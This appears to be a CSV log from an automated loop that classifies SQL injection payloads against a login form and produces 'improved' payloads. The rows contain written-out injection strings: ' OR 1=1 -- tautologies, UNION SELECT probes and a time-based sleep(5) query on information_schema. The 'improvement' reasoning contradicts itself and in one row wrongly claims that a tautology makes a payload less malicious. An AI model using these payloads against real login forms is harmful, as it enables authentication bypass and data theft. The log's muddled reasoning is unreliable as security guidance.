run_id,iteration,payload,classification,reasoning,improvement,improved_payload,test_status,rt_sec,ts,parse_error,improved_differs
b4272cf1-b705-46c1-83c6-713d68c2893e,1,-- RAW SQL injection strings for a login form,SQL Injection Attempt,The payload contains -- RAW SQL injection strings for a login form.,"To mitigate this, we'll add whitespace and use tautology (1=1) to create an improved payload that is less likely to be executed as malicious SQL.","-- RAW SQL injection strings for a login form
-- (1=1) union select sleep(5) from information_schema.tables where table_name = 'users'",200,0.05,2025-08-14T04:48:20Z,0,1
b4272cf1-b705-46c1-83c6-713d68c2893e,1,"SELECT ' UNION SELECT ' || md5(CONCAT('username', 'password')) AS username FROM database_name WHERE user_id = 'your_user_id' AND ( password = 'your_password' OR password = '' ) --",SQL Injection Attempt,"The payload contains SQL syntax (SELECT, FROM, WHERE) and uses a UNION statement, which can be used for SQL injection.","Use proper input validation to sanitize user inputs and avoid the use of dynamic SQL construction, especially in combination with user-supplied data.",' OR 1=1 --,200,0.124,2025-08-14T04:50:06Z,0,1
b4272cf1-b705-46c1-83c6-713d68c2893e,1,"SELECT ' UNION SELECT 1,2 ' || rand() % 100 + 1 AS time_delay FROM database_name WHERE user_id = 'your_user_id' AND ( password = 'your_password' OR password = '' ) --",SQL Injection Attempt,"The payload contains SQL syntax ('SELECT', 'FROM', 'WHERE') and a malicious clause ('UNION SELECT') which is indicative of a SQL injection attempt.",Use prepared statements or parameterized queries to secure your SQL queries.,' OR 1=1 --,200,0.047,2025-08-14T04:51:55Z,0,1
b4272cf1-b705-46c1-83c6-713d68c2893e,1,"SELECT ' OR 1=1 ' || concat(' ', 'AND ') AS operator_form FROM database_name WHERE user_id = 'your_user_id' AND ( password = 'your_password' OR password = '' ) --",SQL Injection Attempt,"The input payload contains SQL statements that are not part of a valid user login query, and the use of concat() function suggests an attempt to manipulate the SQL query dynamically.",Validate user inputs using parameterized queries or prepared statements to prevent SQL injection attacks.,' OR 1=1 --',200,0.043,2025-08-14T04:52:48Z,0,1
